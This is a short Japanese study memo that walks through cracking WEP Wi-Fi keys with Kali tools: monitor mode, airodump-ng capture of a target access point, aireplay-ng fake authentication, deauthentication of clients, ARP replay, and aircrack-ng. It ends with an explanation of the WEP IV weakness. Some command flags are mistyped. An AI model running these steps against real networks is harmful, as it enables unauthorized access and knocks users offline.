kaliで wifi hack! その1 wep編
最近WiFi-Hackについてオベンキョしたのでメモ。
実施環境
USB wifi アダプター PAOU5
手順1
iwconfigでインターフェースを確認
manage mode なら、
ifconfig インターフェース名(wlan0とか) down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
でモニターモードに変更
手順2
airodump-ng インターフェース名(wlan0とか)
ここではアクセスポイント の情報を収集。
ターゲットの情報、bssid channel 等をメモしておく。
手順3
パケットキャプチャ
airodump-ng --bssid (対象のbssid) --channel (対象のチャンネル) -wirte (ファイル名) (インターフェース名)
例
airodump-ng --bssid 00:11:22:33:44:55 --channel 1 -write test wlan0
上記でターゲットのAPの通信情報を収集する
ここまででWepキークラックに必要な情報は収集終了。
が、クラックのためには大量のパケットが必要になるので、下記手順にパケットを収集する。
パケットキャプチャは継続しつつ、別ターミナルで下記手順を実行する。
手順4
アソシエーションの確立
aireplay-ng --fakeauth 0 -a bssid -h インターフェースMACアドレス インターフェース名
例
aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h aa:bb:cc:dd:ee:ff wlan0
認証を確立する。
これを行うことで、APがこちらの通信に対してリアクションをくれるようになる。
手順5
パケット収集する。
方法は問わないが下記に効率よくパケットを収集できる方法を記載する。
-強制切断
aireplay-ng --deauth 任意の回数 -a (bssid) -c (クライアント側のMACアドレス) (インターフェース名)
例
aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c 66:77:88:99:11:22 wlan0
aireplay-ng -arpreplay -b (bssid) インターフェース名
例
aireplay-ng -arpreplay -b 00:11:22:33:44:55 wlan0
手順6
wepキーの解析
上記で集めたデータを元にクラックをかけます。
(大体50000〜1000000あれば十分かと。私は80000でいけました)
aircrack-ng 対象ファイル
例:
aircrack-ng test-01.cap
以上の操作で、必要な分のパケットが揃っていればWEPのパスワードを特定することができる。
以下メモ
#WEPの暗号化鍵は”IV”と”WEPキー”で構成される
IV=パケットごとに異なる24ビットのデータ
WEPキー=APに接続するためのパスワード
上記の暗号化方式は共通鍵の一種なので、送信者、受信者共にIVを知らないと複合ができない。そのため、IVは”平文”でパケットに格納されている。そのためこれを大量に収集することでWEPキーの特定が可能となってしまう。
良い子はWEP使うのやめようね!!!
※当記事に記載ある内容を試す際には自分の環境で実験してください。